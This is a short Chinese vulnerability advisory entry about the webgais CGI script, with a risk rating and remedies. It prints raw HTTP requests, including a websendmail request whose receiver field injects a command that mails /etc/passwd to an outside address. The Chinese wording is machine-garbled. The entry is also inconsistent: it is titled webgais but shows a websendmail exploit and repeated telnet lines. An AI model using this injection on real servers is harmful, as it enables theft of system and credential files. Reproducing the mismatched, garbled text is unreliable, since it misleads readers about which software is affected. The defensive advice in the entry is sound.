14
类型: 进击型
名字: webgais
风险品级: 高
描写: /cgi-bin,目次下的webgais是GAIS搜刮东西的一个接口,它有一个偏差使入侵者可以绕进程序的平安机制,履行体系号令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建议: 建议审核cgi-bin目次,防止有不用要的法式存在
处理办法: 初级用户:编纂websendmail剧本,过滤特别字符
普通用户:删除websendmail文件